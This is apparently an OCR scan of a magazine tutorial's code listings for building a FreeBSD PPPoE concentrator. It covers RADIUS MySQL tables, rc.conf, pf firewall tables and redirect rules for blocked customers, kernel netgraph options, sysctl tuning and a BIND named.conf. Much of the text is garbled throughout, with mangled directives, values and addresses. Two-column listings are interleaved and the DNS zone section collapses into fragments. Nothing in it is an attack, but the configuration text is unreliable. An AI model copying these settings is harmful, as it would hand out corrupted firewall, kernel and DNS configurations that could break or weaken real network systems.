[476 %| Test=50MB | erties clos erieriinie te | += | out#l=all rate-limit 51000000 9562500 19125000 | 
+----- +--------------------- +-------------------- +----4------------------------------------------------ + 


5 rows in set (0.00 sec) 
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Listing 14. 


mysql> select * from usergroup where username=’testuser’ ; 


+------------- +----------- +---------- + 
| UserName | GroupName | priority | 
+------------- +----------- +---------- + 
| TESTUSER | TEST-50MB | i) 
+------------- +----------- +---------- + 


1 row in set (0.00 sec) 


Listing 15. 
mysql> select * from radippool limit 3; 
+----+----------- +----------------- $+-------------- +----------------- $------------------ +------------- +---------- +---------- + 


[Puc |S poolemenes| rc amedipeddrescm | lastpaddvesse (ical leceecrronia \lipecallingstarionitd || expiry einen Username pool key ™)| 


+----+----------- $----------------- $-------------- $----------------- $------------------ +------------- $+------------ $---------- + 
[eo | aimepoolen|s 708.0) Inls26 | | | NULL | NULL | | 0 | 
[SLOSS maim spools |e 20230 mea | | | NULL | NULL | | 0 | 
(I matin eoool 92202 6 | | | NULL | NULL | | 0 | 
+----+----------- $----------------- $-------------- $----------------- $------------------ +------------- $------------ $---------- 4 


3 rows in set (0.00 sec) 


Listing 16. 
the logfile 


+ Cat /ete/re.cont 


hostname="valhalla.connectionlost.com.br” mpd enable="YES” 
UECONNGE GOA Metso. so me tMasik eZ oe 00. 20 oe mpd flags="-b -s mpd5” 
LEConig tgb4 alvas0="inet 19d Tol. 100.5 netmask 

Yao era Sr alreya olor led named enable="YES” 


TECONMG UG bs= Inet 70.2.3) Metiesky 299.25 52205.0 
ip dhe ib) SiaNOILS iilerdeS Telnet Ome WUC seeks icles) WIND) ice. Malye ial, postfix enable="YES” 


Rhem sOumneed tome limb sine ne sendmail enable="NO” 
F#LECOMNG 1Gb2=" up” sendmail submit _enable="NO” 
#ifconiig igbl="up” sendmail outbound enable="NO” 
fiuComig eb0= up] sendmail msp queue enable="NO” 
Gavly se leanehoststab engble= NO” 


detau ueouters=— 20620, ie gaa hy esters Mate ser cers yenaole— NO ™ 


gateway enable="YES” daily status include submit _mailq=”"NO” 


daily submit _queuerun="NO” 
Lovo nace vakre alii imzerkaces= Yrs” 
wjonieg - Cleve civic rtelbhetcng ANNO) olicye: sus Ne psc ysenable= Vio 
LTECconng 1gbU 1pve="Inerse 200M: dbe7:s pretixlen 32” 


1pv6 gateway enable="YES” Syetogdeilags= —=s en e2 720. Ue he 


pf enable="YES” nginx enable="YES” 
pf rules="/etc/pf.conf” 


pf flags=”” fcgiwrap enable="YES” 
pf device=”"/dev/pt” fcgiwrap user="www” 
pilog enable="YES” # start pflogd(8) fcgiwrap socket="unix:/var/run/fcgiwrap/fcgiwrap. sock” 
pfilog flags=”"” # acditional flags tox 
pflogd startup Send senaole= Vhs” 


pilog logfile="/var/log/pflog” # where pflogd should store 
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dumpdev="AUTO” 


Cou Jahinnwy enable = Vino” 


ntpd_enable="YES” 


bsnmpd_enable="YES” 


quagga enable="YES” 
quagga_ flags=”-d” 


quagga_ daemons="zebra ospfd ospf6d” 

watchquagga enable="YES” 

watchquagga flags=”-dz -R ‘/usr/local/etc/rc.d/quagga 
restart’ zebra ospfd ospf6d” 


log 10 enable="YES” 


#teof 


Listing 17. 


Peconic ughl= nets 20S Ue 5 MetMask e250 05.7 0920 
ZusO eG =excsun = uxeaun 

becontig ight aliras0=aneu 198. ol ld. > netmask 
Orne Sr cs oe 

ILECOUNG ug bs=-Inen II7 0 sco Nebildsk 2o0.205 495. 0 so 


-lro -rxcsum -txcsum” 


f#LECONNG go 2— (lp Eso. 110 Shwesum —exesum” 


Listing 18. 

edit /etc/pf.conf: 

ext 1f="igb4” 

ext ip="203.0.113.5” 

exe teo=— 200T dae e2 5” 
extol wad= ie. oi Ls © 


PVG Eh= Egos 

iM p= 92.02.” 

int mét="192.0.2.0/ 247 

Dt WROddedse= ZO jc Oo Ic oo Zoe © 


set limit states 10000000 

set limit table-entries 1000000 
set limit srce-nodes 1000000 

set limit frags 1000000 


set skip on 1o0 
set skip on lol 


set loginterface igb0 


Seite aha) eh 


# tables to run the start scripts from mpdd 
table <PRIVADOS> persist 

table <PUBLICOS> persist 

table <PUBLICOS6> persist 

table <BLOQUEADOS> persist 

table <BLOQUEADOS6> persist 


# table to release access to private ips to the net- 
Work, EYolcalily sed LO SuppOrE 

Table =<GOD> | 203.0 see o 

# table used to create a specific user for infrastructure 
and/or support, without internet access, just access 
to the lan or address released in IPSINFRA table 
(only create a PPPoE user that receives the address 
of the table INFRA) 

table <INFRA> { 203.0.113.70 } 

table <IPSINFRA> { 192.0.2.0/24 } 

# table used for addresses that blocked customer may 
have access to, usually ip PPPoE concentrator and 
your web server to create a block page and access for 
future payment 

palbiley <NONBROCK> {IZ 7-080 1 205 20R ios 203 0 Pisa 

Eainlke  <NONBIOCKCG> {e: ZOO dibs 4 

# table with routers and PPPok concentrators 

Gable. <ROULERS> 4202.0. 113. 205-0. 1 5} 

table <ROUIBRSo> 4 2Z00l dbs] 200M-sdbs- <5 } 

# table of monitoring servers, usually a zabbix for 
checking and cacti for collect servers snmp data 

table <MONITORAMENTO> {203.0.113.10} 

table <MONITORAMENTO6> { 2001:db8::10 } 

# table of who is authorized to consult their recursive dns 

Table <DNS> (2740202 203 202 tis 0/247 193 oie N00. 07 247 19 
23022.07 24} 

table <DNSc> 4-317 2804264053732) 

# table with the ips of Radius servers 

Gabiles<RADIUS> {198 zo 10022} 

# table release to the support system 

Gable <SUPORUE> 205. 0 ila 6o) 

# table of local ips in the PPPoE concentrator 

Pablo hOChi > {( A0s. Oils oye oO eyo 0 2 

take: <LOCAWo> (2001 dba: 5 1} 

# table release to the support system and mpd5 Web interface 

table <SYSADMIN> {203.0.113.69} 

table <SYSADMIN6> {2804:c40::cafe} 

# table from internal connected ips 


table <CONNECIE D> = {os ol 00ers, bo 2 0222S 


Mat On $ext if Lrom <PRIVADOS> to any -> Sext ip 
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Nab Ol Tiel neon <COD> fou ies ious so Millen ne !<SYSADMIN6> to Sext_ipo port {80,666} 
BIO Ch IGUAL Ke NOG eon oor ol hn CE Op mOromECe,UC) eerom 
no rdr proto tcp from <BLOQUEADOS> to <NONBLOCK> I<SYSADMING> LO SeéxL ip6 port 5006 
rdr pass proto tcp from <BLOQUEADOS> to !<NONBLOCK> port pass all 
(Vena alk naa (0}ce| 
rdr proto tcp from <BLOQUEADOS6> to !<NONBLOCK6> port 80 #eof 
BP aerial 
rdr pass proto tcp from <BLOQUEADOS> to !<NONBLOCK> port Listing 19. 
Ae 12 O00 oor 30 # vi /root/kernels/valhalla 
rdr proto tcp from <BLOQUEADOS6> to !<NONBLOCK6> port # netgraph options 
LAS =>) pork “80 options HZ=4000 
options NETGRAPH 
bile@ck in hog iduick from any toroimuesoroadeasce options NETGRAPH PPPOE 
block quick log from <BLOQUEADOS> to !<NONBLOCK> options NETGRAPH SOCKET 
block quick log inet6 from <BLOQUEADOS6> to !<NONBLOCK6> options NETGRAPH CISCO 
pass guick log proto {tcp,udp} from <BLOQUEADOS> to options NETGRAPH ECHO 
<ROUTERS> port S53 options NETGRAPH FRAME RELAY 
pass guick log inet6 proto {tcp,udp} from <BLOQUEADOS 6> options NETGRAPH HOLE 
iO) <ROUTERSO> Pore 55 SpEtOnSs NEGA KoOCKE. 
block in quick log from <PRIVADOS> to <PRIVADOS> options NETGRAPH LMI 
block in quick log from <PUBLICOS> to <PRIVADOS> options NETGRAPH RFC1490 
billock an quick log from <PUBLICOSO> to <PRIVADOS> Options NETCKARR ITY 
block in quick log from <INFRA> to !<IPSINFRA> oyere oyoys! MEME IVA IL INS VINEE 
block wocuuck Tog @ororo {reco ude}, from !<ROULERS> Lo any options NETGRAPH BPF 
pore (1997260172004 2606} options NETGRAPH ETHER 
block Guilck Inez Go peOto {eep, udo}) trom '<.OUTERSG> re epttons NETGRAPH TPACE 
any POrE {199 Viti Zoe. 2501G)} options NETCRAPH VEZ TE 
block quick log proto {tcp,udp} from !<MONITORAMENTO> to options NEI GRAPH Mere ENCRYPT EON 
elon jeoucte. (lieth): options NETCKAPH PPE 
block quick inet6 proto {tcp,udp} from !<MONITORAMENTO6> Certs is IGRAP OEE EPeRE 
E@rany Ore. { Gir} options NETGRAPH TEE 
billock quick log proto {tice udp} trom !<DNsc> to <L0CAL> options NETGRAPH UI 
pork 53 Spttons NETGRAPH VJC 
block qurck Hog ineto proto {tco, udp} from !<PNSG> to options NETGRAPH CAR 
<LOCAL6> port 53 options NETGRAPH NETFLOW 
block quick log from <PRIVADOS> to <CONNECTED> options ALTQ 
block qulck log £rom <PUBLICOS> to <CONNECTED> prions ALLOVCEO 
OpeTons alto eR aw 
lollereic e(bive< Were; in) SKSNIE IIE joiceice) {velo Biche); eos CVETOnS ey nlOm sO 
SNAIDUNUS> = 1c) Sere je) iecicl joeier Soo) options ALTQ HFSC 
biltech Giitch slog on exe y plore eco, udp yerrom Vcois Oe Lome UNINC! ES LO) 
ADMIN> to <LOCAL> port 5006 CpElOns ALLO MNOPree 
ech Guilel OC one cE Ou Ou eco, Ud) eEromay C515 = 
ADMIN> to <LOCAL> port {80,666} device pf 
DO cChkequicle NOG Non cx yrs OLOLom rcp, udp) trom! device pflog 
<SUPORTE> to <LOCAL> port {80,666} device pfsync 
blocks Gulck weg fone sexrE Er InCee proro, {ECe,ude} from 
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OpElone ROUTETABLES=3 

options SC_NORM ATTR=(FG GREEN|BG BLACK) 

options SC_KERNEL CONS ATTR=(FG_ YELLOW|BG BLACK) 
options SC HISTORY SIZE=8192 

#eof 


# make builkernel KERNCONF=valhalla 
# make installkernel KERNCONF=valhalla 


Listing 20. 

i vi (Cue sysctl cont 
kern.ipc.maxsockbuf=157286400 
Net-INel. Eee. sendbour Max=—No7 2756200 
NEE er. ECesneCyDUnG Max—5 1735400 


kern.ipc.nmbclusters=2097152 


net.inet.tcp.cc.algorithm=htcp 
NEE INSEL. ECe Cc htcpradeaprive backorf=1. 
MEN TIE SCP eS «Innes eicie see hale ll 


net.inet.ip.forwarding=1 


net.inet.ip.fastforwarding=1 


net.inet.ip.portrange.first=1024 
net.inet.ip.portrange.hifirst=1024 
net.inet.ip.portrange.last=65535 


kern.ipc.soacceptqueue=65535 


kern.ipc.somaxconn=65535 


net.inet.tcp.mssdflt=1460 
net.inet.tcp.minmss=1300 


net.inet.tcp.rfcl323=1 


Nel. ineL.ccp.ric3390=1 


net.inet.tcp.sack.enable=1 


net.inet.tcp.tso=0 


net.inet.tcp.nolocaltimewait=1 


net.inet.tcp.syncache.rexmtlimit=0 


net.inet.tcp.msl=5000 


.inet.ip.rtexpire=2 


HEI. 

le ees 

OS 

dev.igh.0 
dev.igb.1 
dev.igb.2 
dev.igb.3 
dev.igb.4 
dev.igb.5 
dev.igh.6 
dev.igb.7 
net.inet. 
net.inet. 
net.inet. 
net.inet. 
net.inet. 
net.inet. 
net.inet. 
net.inet. 
net.inet. 
net.inet. 
net.inet. 
net.inet. 
security 
net.inet. 
net.inet 
net.inet. 
net.inet. 
net.inet 
net.inet. 
net.inet. 
net.inet 
net.inet. 
net.inet. 
net.inet. 
net.inet. 


inet.ip.rtminexpire=2 


inet.tcp.syncookies=0 


. f£c=0 
.fc=0 
. fc=0 
.fc=0 
. fc=0 
.fc=0 
. fc=0 
. f£c=0 


ewe 
ieee 
Cee 
tCD. 


Ee. 
udp 
cee 


ieee 
~ ECO. 


ipche cw mn rerrace—ih 
ip. Process Opt ons—0 
ip.redirect=0 
ip.stealth=1 


FCMNO SONGS Ieexel gexec Il 


drop synfin=1 
fast Mmwatt2 eecyele= | 
icmp may rst=0 


ms1l=5000 


-path mtu_discovery=0 
.blackhole=1 
.blackhole=2 
usisrels 


see other uids=0 


ecn.enable=1 


maxtcptw=15000 


icmp.icmplim=0 


Bem. 
EC OY 
blolon 


udp 


BeCD. 
ECO. 


ew. 


COs 
ECD. 


sendspace=262144 
recvspace=262144 
recvspace=16772216 


.maxdgram=57344 


sendbuf inc=32768 
KSCVOUn HEME=O99 2.0 


hostcache.expire=3900 


delayed _ack=1 
delacktime=50 


kern.sched.interact=30 


kern.sched.slice=12 


net.local.stream.sendspace=164240 
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net.local.stream.recvspace=164240 net.inet.tcp.hostcache.bucketlimit="100” 
kere teandeiles ys. larvyest.crtlennien—0 coreremp Toad=" YES” 
keri randompsys Nerves. 1nNcernupr—U Eesnvep eload=" (ha 


keGieGandome s/s las vesr Oo Mins nOuPpeOlmlr— 


ker bandom-= sys. Narvest.swi—U bE Lge eload= “Vio 
kern.ipc.maxsockets=524288 loader Togo= beastie” 
net.inet.raw.maxdgram=16384 net.link.ifqmaxlen="1024” 


net.inet.raw.recvspace=16384 


hw.igb.txd="4096” 


net.inet6.icmp6.nodeinfo=0 hw.igb.rxd="4096” 

Netostnicve. up6 use tempaddr=i hve GiaexeOEuecess eit b= 1” 

Net. ticle. 190. preres tempaddr— | hve toeenalble vaini— i" 

Net. Ineo. tempo. vedi caccepr—l hw tgb.Max Interrupt rate= "32000" 
Nie INeho. Lo, aceeprearady— hw.igb.num_ queues="0” 
##net.inet6.ip6.auto linklocal=0 hw.igb.enable msix="1” 
kern.ipc.shmmax=2147483648 kKern.ipce.nmbclusters=" 72097152” 
kern.ipc.shmall=2097152 kern.ipc.nmbufs="6434970” 


Kern toc -nmojumbop= 935356" 
kern.maxvnodes=100000000 

lays Light ie Vsveoraiil seloiiatcisiloron Lely 2101010) 4 
net.graph.maxdgram=16772216 


net.graph.recvspace=16772216 net.inet.tcp.tcbhashsize="65536” 
net.inet.tcp.blackhole=2 net.isr.bindthreads="0” 
net.inet.udp.blackhole=1 net.isr.defaultqlimit="4096” 

NCE INcE. ECO. drop is ynin—=i net.isr.maxthreads=7 


net.inet.tcp.syncookies=1 
NEE Enea Clie ROPE necuneer—il kern.ipc.maxsockets=524288 


net.inet.1emp. log redirect=0 


net.inet.ip.redirect=0 #eof 
#eof 

# vi /boot/loader.conf 

kern.maxusers=1024 

net.graph.maxdata=65536 

net.graph.maxalloc=65536 

kern.ipc.maxpipekva=620000000 
net.inet.tcp.syncache.hashsize=1024 
net.inet.tcp.syncache.bucketlimit=512 


net.inet.tcp.syncache.cachelimit=65536 


net.inet.tcp.hostcache.hashsize="16384” 
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Install fegiwrap: 


# cd /usr/ports/www/fcgiwrap 


# make install clean 
Install quagga: 


# cd /usr/ports/net/quagga 


# make install clean 
Install log.io: 


# cd /usr/ports/www/npm 


# make install clean 

# ln -s /usr/local/bin/python2.7 /usr/local/bin/python 
# In -s /usr/bin/clangt+ /usr/bin/gt+ 

# npm config set python /usr/local/bin/python2.7 

# npm install -g node-gyp 

# npm install. =-g log.10 —“user ‘root’ 

Install sudo: 


# cd /usr/ports/security/sudo 


# make install clean 


Install radvd: 


Listing 21. 


tov) Sue, resol vy necontr 


nameserver 127.0.0.1 


# Vi /usr/local/etc/namedb/named. cont 


Opelons { 


// All file and path names are relative to the chroot 


Girectory, 

// if any, and should be fully qualified. 
directory “/usr/local/etc/namedb/working” ; 
pid-file “/var/run/named/pid”; 

dump-file “/var/dump/named_ dump.db”; 


Shanictics=(lleous 9 /var/ stale) mameanctats 


allow-query { trusted; }; 


cul Ome iecideter (| Creme Vals jee 


licjccen=-One {sly 0s On i 200. oe 
ITeren-on—v 6 ie alles IOI ology ese a 


disable-enpty=zone. “2554250425042 5004 IN-ADDR ARPA”: 
disable=-empiy=zene ~0:.0.0.0. 0.0.0.0. 020.020. 00.0. 0.0 
JOO. CeO. 0. On0n0e C0. 0.05020. LPosARPAY : 
disable-enpuy=-zone ~l.0.020.0 20,020.20 .0 2.020 .0.020 20.0 
OP SOTO Oa Oa) 000 OLS ICR Ohs OR Oe siblatey weed eran 


channel avic tig Foon, 
files Yver/ log securiey. log = 
severity debug; 
PelLneseMile wes, 


ie 


channe I <reneloga 


file “/ vary louy <ter.log 
severity debug; 
jebeuk ees: Wes: 


ne 


category default { systemlog; }; 

Eduegony eSecurity e( saudi log, Ssycuemlog, aj, 
category config { systemlog; }; 

Cabegonky x<rem— ina ( eter slog a), 

OgwecOiey cei OUle i Seeie logs jis 

GelwSeioieyy WMOusey (b cibicbie bore |r 

Gareecicy tecewe (| alee ec i 

Geilecory CuUectes ( aucllu logs i 6 

Ecadvegory Vamesseuvyers (saudieylog,s), 


tee 


sell Cuwlasie ime || 


Alsen O) gil eka ors 
}; ee Oe alOT le 
bar 
logging 1 acl triswed —{ 
channel systemlog { PZ 0 Oa: 
file “/var/log/named.log”; F060. ise 0724. 
severity debug; IORI Oya 
print-time yes; PACNGUL stolleress 3 // iz 6 
yi }; 
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zone “.” { type hint; file “/usr/local/etc/namedb/named.root”; }; 


zone “localhost” { type master; file “/usr/local/etc/namedb/master/localhost-forward.db”; }; 
Zone 2]. in-adensaroa’ { type master; file “/usr/local/etc/namedb/master/localhost-reverse.db”; }; 


ZOMe n2 5 sin adcie aca, { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


zone “O.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/localhost-reverse.db”; }; 


zone “O.in-addr.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


zone. L0yin-addeeareay { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


nS Ares 


zone “16.172.in-addr.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


fn 


zone “17.172.in-addr.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


A Te 


Zone; “KS IZ. in-acde aria type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


afi safes 


Zone, 19a Zea neaddrearoa type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


Zone “ZUR i 2. in—-addr. aicpa type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


a 


Zone.” 21s dy Zain addr na roe type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


Zone 275) ein cdene aeoa type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


Aes 


Zone “25.1)/2 -in—-adar arpa type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


fis afi 


gone “24.17/2.in-addr-arpea type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


A 


zone “25.172.in-addr.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


Zome “2Z6,1/2.1n-addr arpa type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


Zone, “Z2)/ eli Zin -add re arpa type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


a 


Zone = 28.1) 2 ain-addr rare type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


Zone 2o 7 cde es ciaoa type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


A = ARS 


Zone “S0e 112 an—adem arpa type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


A aL ps 


type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


ial 
Ss 
= Comey Coen Come Comey J a= o_ on (meme --Z_ Content Comoe Y meme o« 


Zone “sail /Zetiaaddr sakea! 


Ww 


zone “168.192.in-addr.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


zone “64.100.in-addr.arpa type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


zone “65.100.in-addr.arpa type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


fees 


zone “66.100.in-addr-arpa type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


zone “67.100.in-addr.arpa type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


af fs 


type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


zone “6S. 100.4n-eddr. arpa 


A Tes ae 


type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


Zones oO 2 OURAN —adcr dbba 
Zone. “10m ENO 2 in adds aca O- type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


zone. “Ti 100 in-addr2 arpa type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


a 


Zone: “72.00 in-add rear pa type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


fs, 


Zone. “se NO sinaaddcatcoa type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


1 


zone “74.100.in-addr.arpa type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


4. fine 


Zone “j5e 100. dn-addr arpa type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


Zone.  ToaO0n im cide. aicoa type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
Zone 1) el OOP adc ia nOa type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


zone “78.100. in-addreanrpa type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


a 


gone “79. 100.in—-addr arpa type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


afi fas 


zone “S021 00,in-=addr-arpa type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


AS 


zone “81.100.in-addr.arpa type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


= 
Ss 
oa oan “«_~ Come Content Contant Comey = on Comoe} meee ~_ Z a= on mtent _~ ia Comey 


gone “82.100.in-addr-arpa type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
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ZONE 


ZONE 


ZONE 


ZOne 


ZONE 


ZONne 


ZONE 


ZONE 


ZONE 


ZOne 


ZONE 
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ZONE 


ZONE 


ZONE 


ZONE 
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ZOne 
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ZONE 
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ZONE 
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ZONE 
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ZONE 


ZONE 
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"64s. 00 
YOUU 
eo. OO 
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OF Ie) 
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OO LOO 
ne orig 
oe LUI: 
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Pee 00 
eI) 
POC LOO: 
ple Ole) e es: 
OZ SIONS 
LOS. 00; 
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ACK o srl UCHO 
LOC COR 
pe O ly Set) 
S08 OO 
AO IRCOS 
OOO 
ines Lee 
ailaleraead(CO 
HES. OOF 
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PAU Semel O18 
ore 
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noe Lee 
AG Oe 
aero 
ee Os 
lez ROO? 
S24 LOO 
PZ Oe LOO, 
D2G Oe 
EZ ARO 
Zoe Ge 
“OU. Lous 


sla. 


in-addr. 


[eee TE rte, EE cote, SE te, TE ete, TE ste EE te, SE te, tee, crt, te, te, SE te, tee, ee, ote, SE cee 


Cee EE corte SE ete, EE cree, TE rte, EE tee, ete, SE tee, ete, cree, TE te, ct RE tee, SE ete, ote, ee, cnt, tee, TE cree, te TE ee, SE ee cee EE ote, EE tee, SE ce, TE ee, SE ee 


vice 
Eyee 
Eype 
Eyee 
Evee 
type 
Lye 
iL vice 
Lye 
Evoe 
Eype 
Evee 
Lice 
Eyes 
Lvs 
Lye 
Eyes 
Eype 
Eyoe 
IL vices 
iL vice 
iL vice 
Eype 
Evee 
Eype 
Eype 
iL vice 
Lye 
Lvice 
Eype 
Eyes 
Eype 
Eyoe 
vice 
ive 
IL vice 
Eype 
Evve 
type 
Eye 
vice 
Lye 
Eyoe 
Eype 
Evve 


Loe 


iL vice 


master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
Mase; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 


master; 


master; 


master; 


file 


file 


file 


“/usr/local/etc/name 
“/usr/local/etc/name 
“/usr/local/etc/name 
“/usr/local/etc/name 
“/usr/local/etc/name 
“/usr/local/etc/name 
“/usr/local/etc/name 
“/usr/local/etc/name 


ery local) ec mame 


asi) 


“/asr/ local/etc/name 


sn) Moca ere, mame 


WG 
U1 
Sear 
UU 
eras 
UA 
aH 
UU 


ei 


“/usr/local/etc/namedb/ma 
a hose all 
“/usr/local/etc/nam 
“/usr/local/etc/nam 
“/usr/local/etc/nam 


/etc/namedb/m 


By colicsay 


W/ust/ locally etc; nam 
“/usr/local/etc/nam 
“usr Local /enc/ nam 
By cblcvieg als 
“/usr/local/etc/nam 
“/usr/ Local /etc/nam 
“/usr/local/etc/namedb/m 
“/usr/local/étc/nam 
“/usr/local/etc/nam 


yaar) loca ly etc mam 


ra 
UU 
ida 
UU 
Sa 
UA 
wy 
UA 


w/ US tae 
“/usr/local/etc/nam 
WUsTy/ Local) ercy nam 
“/usr/local/etc/nam 


wy edey kb 


Sie ek 


say alk 


ocal 


sr/local/etc/name 


ocal 


sr/local/etc/name 


sr/local/etc/name 


Oa 


sr/local/etc/nam 


/etc/name 


(ene, mame 


o¢ell 


Local: 


ocal 


ocal 


iI/fete/ nam 


ocal 


ocal 


A Tee 


fis 


af 


. 


ey 


a 


aS 


Te 


fis 


/erc/ nam 


pes 


his 


(ace mam 


A Tee 


shi 


ate 


/etc/nam 


afi 


As 


Si) locale rey named tm 


/etc/nam 


hiss 


/etc/nam 
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zone “2.0.192.in-addr.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “100.51.198.in-addr.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zZone= “ls s0.203.in-addr arpa” { tyoe Master; tle: “/usr/ local) etcy/ mamedb/master/empry do”; }; 


Zone “8 sbed,0.1.0.0.2.106.arpe” { type master? file “/usr/local/etc/namedb/master/empty.db”; }; 


zone “test” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 

zone “example” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “invalid” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “example.com” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


zone “example.net” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


zone “example.org” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


zone “18.198.in-addr.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “19.198.in-addr.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


zone “24 type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


4. 


zone “24 type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


ofa 


zone “24 type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


abe, 


zone “24 type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


4. 


zone “24 type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


4 


zone “24 type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


1. 


zone “24 type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


0 
il 
2 
s 
zone “244,1in-addr.arpa” 
5 
6 
7 
8 


zone “24 type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


ofa 


zone “249.in-addr.arpa type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


abe, 


Zone “250 in=addr, arpa type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


pe 


Zone. “2Zolein-adersaroa” type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


1. 


Zone. “252 in-addr aroa” type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


4. 


ZONE. “255. in—addirearoa type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


1. 


type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


k 
=) 
| 
el 
(Oh, 
@r 
KB 
a 
bB 
OQ) 
OQ) 
en en ey 


ZOne- “754. 1n=eddroarpa” 


sof fees 


zone “O.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
iB eel ele) De 


eycle ye 


Aree es 


zone “1.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/em 


fs 


zone “2.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/em 


zone “l.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “3.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “4.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “5.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “6.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
Zone “/.1p6rarpa’  { type master; fle “/usr/local/etc/namedb/master/empty-db’ ; 7}; 
zone “8.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “9.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “a.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “b.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “c.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “d.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “e.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 

Pp 

p 
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zone “3.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “4.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “5.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “6.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “7.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “8.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “9.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “a.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “b.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “O.e.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “l.e.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “2.e.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “3.e.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
